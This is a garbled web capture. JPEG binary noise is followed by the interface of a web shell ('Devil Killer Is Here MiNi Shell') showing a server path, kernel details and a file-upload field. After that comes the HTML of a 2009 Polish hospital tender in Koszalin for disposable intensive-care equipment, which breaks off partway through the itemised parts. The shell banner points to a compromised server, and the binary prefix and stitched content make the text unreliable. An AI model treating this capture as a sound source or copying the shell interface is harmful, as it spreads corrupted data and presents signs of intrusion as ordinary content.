JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090709/229896-N-2009.html

<p class="kh_header"><b>Koszalin: SPRZĘT MEDYCZNY JEDNORAZOWEGO UŻYTKU DLA ODDZIAŁU INTENSYWNEJ TERAPII</b><br>
<b>Numer ogłoszenia: 229896 - 2009; data zamieszczenia: 09.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wojewódzki im. Mikołaja Kopernika , ul. T. Chałubińskiego 7, 75-581 Koszalin, woj. zachodniopomorskie, tel. (094) 3488103, faks (094) 3488103.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swk.med.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SPRZĘT MEDYCZNY JEDNORAZOWEGO UŻYTKU DLA ODDZIAŁU INTENSYWNEJ TERAPII.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1 - igły do znieczulenia podpajęczego - 3750 szt.
Zadanie nr 2 - igły do blokad splotów nerwowych - 270 szt.
Zadanie nr 3 - rurki intubacyjne, rurki ustno-gardłowe, maski krtaniowe - 14115 szt.
Zadanie nr 4 - rurki tracheostomijne jednorazowe - 370 szt.
Zadanie nr 5 - maseczka twarzowa - wielorazowego użytku - 40 szt.
Zadanie nr 6 - rurki dooskrzelowe - 8 szt.
Zadanie nr 7 - zamknięty system do odsysania górnych dróg oddechowych - 100 szt.
Zadanie nr 8 - drenaże klatki piersiowej - 29 szt.
Zadanie nr 9 - worki do godzinowej zbiórki moczu - 200 szt.
Zadanie nr 10 - sterylne filtry elektrostatyczne i mechaniczne dla dorosłych - 8100 szt.
Zadanie nr 11 - sterylne filtry elektrostatyczne i mechaniczne pediatryczne - 2000 szt.
Zadanie nr 12 - sterylne filtry elektrostatyczne i mechaniczne noworodkowe - 700 szt.
Zadanie nr 13 - sterylne filtry elektrostatyczne i mechaniczne do rurek tracheostomijnych i intubacyjnych - 400 szt.
Zadanie nr 14 - przepływowy nawilżacz tlenu jednorazowego użytku - 400 szt.
Zadanie nr 15 - aparaty do pompy Abbott - 400 szt.
Zadanie nr 16 - aparaty do pompy Braun - 825 szt.
Zadanie nr 17 - regulator prędkości przepływu - 2500 szt.
Zadanie nr 18 - kocyki dla dorosłych  do aparatu Equator - 200 szt.
Zadanie nr 19 - linie do podgrzewacza Hotline - 250 szt.
Zadanie nr 20 - zestawy do kaniulacji dużych naczyń, zestawy do przezskórnego drenażu - 3600 szt.
Zadanie nr 21 - zestawy do pomiaru ciśnienia - 600 szt.
Zadanie nr 22 - obwody do respiratora Neftis - 120 szt.
Zadanie nr 23 - obwody do aparatów do znieczulenia - 500 kpl.
Zadanie nr 24 - obwody do respiratora (OIT) - 600 kpl.
Zadanie nr 25 - konektor kątowy 90o - 300 szt.
Zadanie nr 26 - elektrody do czasowej stymulacji serca - 50 szt.
Zadanie nr 27 - przyrządy do żywienia dojelitowego - 1580 szt.
Zadanie nr 28 - worki kolostomijne - 400 szt.
Zadanie nr 29 - kraniki trójdrożne - 8800 szt.
Zadanie nr 30 - dreny do pompy objętościowej Graseby 3000 - 700 szt.
Zadanie nr 31 - cewniki do odsysania, przedłużacze, zgłębniki - 157720 szt.
Zadanie nr 32 - zestawy do znieczuleń zewnątrzoponowych ciągłych, oraz łączonych zewnątrzoponowo-podpajęczych (CSE) - 1050 szt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 32.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełnią następujące warunki:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień:
a) prowadzą zarejestrowaną działalność gospodarczą w zakresie objętym przedmiotowym zamówieniem;
b) nie zalegają z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub uzyskali przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub mają wstrzymane w całości wykonanie decyzji właściwego organu;
c)  nie figurują w Krajowym Rejestrze Karnym na podstawie art. 24 ustawy Prawo zamówień publicznych.
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

2. Ocena spełnienia warunków udziału w postępowaniu o udzielenie zamówienia publicznego
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia w następujący sposób:
1) Zamawiający na podstawie złożonych wraz z ofertą dokumentów będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonego przez Zamawiającego warunku,
2) w przypadku, gdy wymóg spełnienia warunku zostanie potwierdzony w dokumentach złożonych przez Wykonawcą, warunek zostanie uznany za spełniony,
3) w przypadku, gdy wymóg spełnienia warunku nie zostanie potwierdzony w dokumentach złożonych przez Wykonawcę, warunek zostanie uznany za niespełniony..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o do puszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;
2) aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
3) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;
4) aktualna informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;
5) oświadczenie do postępowania o zamówienie publiczne z art. 22 ust. 1 ustawy Prawo zamówień publicznych.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.swk.med.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Wojewódzki im. Mikołaja Kopernika
ul. T. Chałubińskiego 7, 75-581 Koszalin.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.07.2009 godzina 10:00, miejsce: Szpital Wojewódzki im. Mikołaja Kopernika
ul. T. Chałubińskiego 7, 75-581 Koszalin
Dział Zamówień Publicznych, pok. nr 11.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> IGŁY DO ZNIECZULENIA PODPAJĘCZEGO.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) igły do znieczulenia podpajęczego typu pencil - point 25G x 90 mm - 450 szt.
2) igły do znieczulenia podpajęczego typu pencil - point 26G x 90 mm - 2500 szt.
3) igły do znieczulenia podpajęczego typu pencil - point 27G x 90 mm - 450 szt.
4) igły do znieczulenia podpajęczego typu pencil - point 26G x 130 mm - 50 szt.
5) igły do znieczulenia podpajęczego typu standard 25G x 90 mm - 100 szt.
6) igły do znieczulenia podpajęczego typu standard 26G x 90 mm - 100 szt.
7) igły do znieczulenia podpajęczego typu standard 22G x 90 mm- 100 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> IGŁY DO BLOKAD SPLOTÓW NERWOWYCH.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) igły do blokad splotów nerwowych i nerwów obwodowych przy użyciu stymulatora typu STIMUPLEX DIG RC 22G/50 mm - 250 szt.
2) igły do blokad splotów nerwowych  i nerwów obwodowych przy użyciu stymulatora typu STIMUPLEX DIG RC 24G/100 mm - 20 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> RURKI INTUBACYJNE, RURKI USTNO-GARDŁOWE, MASKI KRTANIOWE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) rurki z mankietem uszczelniającym 3,5 - 100 szt.
2) rurki z mankietem uszczelniającym 4,0 - 100 szt.
3) rurki z mankietem uszczelniającym 4,5 - 300 szt.
4) rurki z mankietem uszczelniającym 5,0 - 450 szt.
5) rurki z mankietem uszczelniającym 5,5 - 380 szt.
6) rurki z mankietem uszczelniającym 6,0 - 350 szt.
7) rurki z mankietem uszczelniającym 6,5 - 350 szt.
8) rurki z mankietem uszczelniającym 7,0 - 1200 szt.
9) rurki z mankietem uszczelniającym 7,5 - 1200 szt.
10) rurki z mankietem uszczelniającym 8,0 - 1300 szt.
11) rurki z mankietem uszczelniającym 8,5 - 400 szt.
12) rurki z mankietem uszczelniającym 9,0 - 50 szt.
13) rurki bez mankietu 2,0 - 100 szt.
14) rurki bez mankietu 2,5 - 100 szt.
15) rurki bez mankietu 3,0 - 100 szt.
16) rurki bez mankietu 3,5 - 100 szt.
17) rurki bez mankietu 4,0 - 100 szt.
18) rurki bez mankietu 4,5 - 100 szt.
19) rurki bez mankietu 5,0 - 300 szt.
20) rurki bez mankietu 5,5 - 100 szt.
21) rurki bez mankietu 7,0 - 100 szt.
22) Do podawania surfaktantu z drenem zintegrowanym - 120 szt.
23) rurki zbrojne 7,0 - 20 szt.
24) rurki zbrojne 8,0 - 50 szt.
25) rurki zbrojne 9,0 - 5 szt.
26) rurka ustno-gardłowa 2 - 1500 szt.
27) rurka ustno-gardłowa 3 - 3000 szt.
28) rurka ustno-gardłowa 4 - 2000 szt.
29) rurka nosowo-gardłowa 7 - 20 szt.
30) rurka nosowo-gardłowa 8 - 20 szt.
31) Maska krtaniowa 3 - 50 szt.
32) Maska krtaniowa 4 - 50 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> RURKI TRACHEOSTOMIJNE JEDNORAZOWE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 ) Standardowe z ruchomym szyldem bez mankietu 3,0 - 10 szt.
2 ) Standardowe z ruchomym szyldem bez mankietu 3,5 - 20 szt.
3 ) Standardowe z ruchomym szyldem bez mankietu 4,0 - 20 szt.
4 ) Standardowe z ruchomym szyldem bez mankietu 4,5 - 10 szt.
5 ) Standardowe z ruchomym szyldem z mankietem 6,0 - 10 szt.
6 ) Standardowe z ruchomym szyldem z mankietem 7,0 - 10 szt.
7 ) Standardowe z ruchomym szyldem z mankietem 8,0 - 10 szt.
8 ) Standardowe z ruchomym szyldem z mankietem 9,0 - 10 szt.
9 ) Standardowe z ruchomym szyldem z mankietem 10,0 - 10 szt.
10 ) Standardowe z szyldem stałym z mankietem 5,0 - 10 szt.
11 ) Standardowe z szyldem stałym z mankietem 5,5 - 10 szt.
12 ) Standardowe z szyldem stałym z mankietem 7,0 - 20 szt.
13 ) Standardowe z szyldem stałym z mankietem 7,5 - 40 szt.
14 ) Standardowe z szyldem stałym z mankietem 8,0 - 50 szt.
15 ) Standardowe z szyldem stałym z mankietem 8,5 - 50 szt.
16 ) Standardowe z szyldem stałym z mankietem 9,0 - 30 szt.
17 ) Standardowe z szyldem stałym z mankietem 9,5 - 20 szt.
18 ) Z możliwością odsysania przestrzeni nad mankietem 7,0 - 10 szt.
19 ) Z możliwością odsysania przestrzeni nad mankietem 8,0 - 10 szt.
20 ) Z możliwością odsysania przestrzeni nad mankietem 9,0 - 10 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> MASECZKA TWARZOWA - WIELORAZOWEGO UŻYTKU.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 ) Maseczka twarzowa średnia - 10 szt.
2 ) Maseczka twarzowa duża - 10 szt.
3 ) Maseczka do tlenoterapii z zaworem do regulacji ciśnienia mankietu maski - 20 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> RURKI DOOSKRZELOWE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 ) Rurka dooskrzelowa prawa 37 - 2 szt.
2 ) Rurka dooskrzelowa prawa 39 - 2 szt.
3 ) Rurka dooskrzelowa lewa 37 - 2 szt.
4 ) Rurka dooskrzelowa lewa 39 - 2 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> ZAMKNIĘTY SYSTEM DO ODSYSANIA GÓRNYCH DRÓG ODDECHOWYCH.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 ) do rurek intubacyjnych 16 - 50 szt.
2 ) do rurek tracheostomijnych 14 - 50 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> DRENAŻE KLATKI PIERSIOWEJ.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 ) Zestaw do drenażu klatki piersiowej min. 2500 ml - 5 szt.
2 ) Zestaw drenów do drenażu dwubutlowego - 12 szt.
3 ) Zestaw drenów do drenażu jednobutlowego - 12 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> WORKI DO GODZINOWEJ ZBIÓRKI MOCZU.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Worek do godzinowej zbiórki moczu min. 2000 ml - 200 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> STERYLNE FILTRY ELEKTROSTATYCZNE I MECHANICZNE DLA DOROSŁYCH.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 ) Sterylny filtr elektrostatyczny z wymiennikiem ciepła i wilgoci dla dorosłych - 7 000 szt.
2 ) Sterylny filtr mechaniczny z wymiennikiem ciepła i wilgoci dla dorosłych - 600 szt.
3 ) Sterylny filtr elektrostatyczny z wymiennikiem ciepła i wilgoci z wejściem bocznym dla dorosłych  - 500 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> STERYLNE FILTRY ELEKTROSTATYCZNE I MECHANICZNE PEDIATRYCZNE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 ) Sterylny filtr elektrostatyczny z wymiennikiem ciepła i wilgoci, pediatryczny - 1500 szt.
2 ) Sterylny filtr elektrostatyczny z wymiennikiem ciepła i wilgoci, pediatryczny z wejściem bocznym - 500 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> STERYLNE FILTRY ELEKTROSTATYCZNE I MECHANICZNE NOWORODKOWE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylny filtr elektrostatyczny z wymiennikiem ciepła i wilgoci, noworodkowy - 700 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> STERYLNE FILTRY ELEKTROSTATYCZNE I MECHANICZNE DO RUREK TRACHEOSTOMIJNYCH I INTUBACYJNYCH.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylny filtr do rurek tracheostomijnych i intubacyjnych - 400 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> PRZEPŁYWOWY NAWILŻACZ TLENU JEDNORAZOWEGO UŻYTKU.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Woda do tlenoterapii biernej- jałowa 500 ml - 400 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> APARATY DO POMPY ABBOTT.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Aparaty do pompy infuzyjnej - 400 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> APARATY DO POMPY BRAUN.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Aparaty do pompy infuzyjnej - 750 szt.
2) Aparaty do przetaczania krwi i środków krwiopochodnych - 75 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> REGULATOR PRĘDKOŚCI PRZEPŁYWU.</p>
